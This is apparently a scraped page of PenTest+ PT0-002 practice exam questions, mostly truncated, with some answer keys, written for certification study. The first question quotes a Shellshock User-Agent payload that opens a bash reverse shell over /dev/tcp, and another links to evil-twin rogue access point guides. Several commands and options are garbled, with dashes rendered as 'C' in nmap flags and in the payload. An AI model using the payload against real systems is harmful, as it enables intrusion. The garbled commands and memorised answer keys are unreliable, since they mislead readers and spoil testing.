PT0-002 exam

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”} Which of the following edits should the tester make to the...

A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours. Which of the following BEST describes why this would be necessary?A . To meet PCI DSS testing requirementsB . For testing of the customer's SLA with the ISPC...

During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?A . Changing to Wi-Fi equipment that supports strong encryptionB . Using directional...

A penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities. Which of the following tools would be BEST suited for this task?A . GDBB . Burp SuiteC . SearchSpliotD . NetcatView AnswerAnswer: A

A penetration tester ran a simple Python-based scanner. The following is a snippet of the code: Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?A . sock.settimeout(20) on line 7 caused each next socket to be created every 20 milliseconds.B...

CORRECT TEXT SIMULATION Using the output, identify potential attack vectors that should be further investigated. View AnswerAnswer: 1: Null session enumeration Weak SMB file permissions Fragmentation attack 2: nmap -sV -p 1-1023

A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?A . WiresharkB . Aircrack-ngC . KismetD . WifiteView AnswerAnswer: B Explanation: Reference: https://null-byte.wonderhowto.com/how-to/hack-wi-fi-stealing-wi-fi-passwords-with-evil-twin-attack-0183880/ https://thecybersecurityman.com/2018/08/11/creating-an-evil-twin-or-fake-access-point-using-aircrack-ng-and-dnsmasq-part-2-the-attack/

A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?A . nmap192.168.1.1-5CPU22-25,80B . nmap192.168.1.1-5CPA22-25,80C . nmap192.168.1.1-5CPS22-25,80D . nmap192.168.1.1-5CSs22-25,80View AnswerAnswer: D Explanation: The -sS option in nmap is for SYN...

A client evaluating a penetration testing company requests examples of its work. Which of the following represents the BEST course of action for the penetration testers?A . Redact identifying information and provide a previous customer's documentation.B . Allow the client to only view the information while in secure spaces.C ....

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?A . Run nmap with the Co, -p22, and CsC options set against the targetB . Run nmap with...